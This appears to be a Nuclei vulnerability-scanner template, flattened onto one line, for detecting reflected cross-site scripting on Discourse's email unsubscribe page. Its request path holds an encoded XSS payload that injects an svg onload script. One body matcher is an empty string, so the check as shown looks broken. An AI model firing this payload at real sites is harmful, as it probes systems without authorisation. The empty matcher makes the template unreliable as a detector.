id: discourse-xss info: name: Discourse CMS - XSS author: madrobot severity: medium description: Cross-site scripting (XSS) on Discourse CMS tags: xss,discourse requests: - method: GET path: - '{{BaseURL}}/email/unsubscribed?email=test@gmail.com%27\%22%3E%3Csvg/onload=alert(/xss/)%3E' matchers-condition: and matchers: - type: status status: - 200 - type: word words: - "" part: body - type: word words: - "text/html" part: header